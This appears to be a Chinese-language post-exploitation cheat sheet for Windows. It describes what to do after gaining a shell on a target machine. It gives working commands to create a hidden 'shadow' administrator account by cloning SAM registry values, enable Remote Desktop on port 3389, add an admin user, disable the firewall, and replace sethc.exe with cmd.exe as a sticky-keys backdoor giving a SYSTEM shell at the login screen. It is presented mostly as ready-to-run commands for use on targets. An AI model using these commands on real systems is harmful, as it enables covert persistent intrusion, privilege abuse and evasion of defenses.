#当获得一条shell后,可以创建一个影子用户,通过影子用户可以行驶正常用户的所有权限与功能,
并且只可在注册表中被检测出来---(应急响应注册表很重要)
1.首先需要拥有权限创建一个Administrator用户,并分配管理员权限。
net user haha$ 123 /add #创建一个新用户haha 密码是123
net localgroup administrators haha$ /add #将该新用户移动到管理员组下
net localgroup users haha$ /del #删除这个用户的记录
2.切换到影子用户下,然后打开注册表HKEY_LOCAL_MACHINE\SAM\SAM,右击权限,找到
Administrators勾选完全控制,关闭注册表。
3.在注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names找到要创建
到账户,与其默认类型。(如果找不到domains,可以百度解决)
可以看到这个隐藏用户的默认类型是0x3f1
4.将隐藏用户导出注册表1.reg,放入桌面
5.将隐藏用户默认类型对应的注册表导出为2.reg到桌面上
6.接着导出想要复制的账户的默认类型,比如管理员帐户的默认类型为00001F4导出为3.reg
最终得到3个文件
7.然后打开2.reg,将3.reg中的F值对应替换为2.reg中的值,保存2.reg,删除3.reg.
8.在CMD窗口下,先在管理员权限下运行,删除用户haha$
net user haha$ /del
再次打开注册表发现之前注册表隐藏信息已经清楚,然后把1.reg,2.reg导入注册表
此时被修改后的注册表信息再次导入到注册表
此时影子用户已经完成。可以通过打开3389端口来远程连接,用影子用户的账号密码进行登陆。
查看端口开放情况:
cmd→netstat -ano
开放3389端口的方法1:
echo Windows Registry Editor Version 5.00>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
将以上内容拷贝到文本文档内,将后缀名改为.bat格式,双击运行,即可开启3389端口。
开启端口方法2:
在cmd内,执行如下命令,即可开启3389端口。
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
在cmd内,执行如下命令,即可关闭3389端口。
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
开放完3389端口后,需要先明确被连接的主机的ip地址。可以通过cmd→ipconfig查看ipv4的内网地址,后连接即可。
连接后发现,可以通过原先创建的影子用户来访问该计算机,且获得了最高权限。账户 haha$ 密码123(看个人的设置)
3389连接windows的实践:
1.在目标系统开放3389端口
2.查看ip地址
3.进行远程桌面连接 即可连接成功
PS:针对最新的windows操作系统 需要注意 win10的安全策略很多,需要多重开放连接才行。 受限制于系统版本 有时候系统本身也不支持远程连接
通常支持的系统 只需要开放3389端口以及相关服务 同时支持远程连接 即可成功连接!
连接条件:
1.计算机本身支持远程桌面 同时这个要允许远程桌面
2.win+R -> services.msc -> 桌面服务 remote desktop services 把相关的RPG服务打开 (cmd下的注册表命令同理)
3.知道目标的ip地址
新建用户 提权到管理员 关闭防火墙
net user zj 123 /add
net localgroup administrators zj /add
net user zj 123 /del
netsh advfirewall set allprofiles state off
(大招)shift漏洞(后门) 直接在登录界面按五下shift键即可召唤出system权限的cmd
把代码放到bat文件中 传上去以后执行就行
takeown /f c:\windows\system32\sethc.* /a /r /d y
cacls c:\windows\system32\sethc.exe /T /E /G system:F
cacls c:\windows\system32\sethc.exe /T /E /G administrator:F
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe /y
远程服务(3389)启动(3条命令打下去绝对成功)
win+r = mstsc
扫描的时候:13389
C:\Windows\System32\wbem\wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
net start TermService
如果是特殊端口 目标ip:13389 xxxx:13389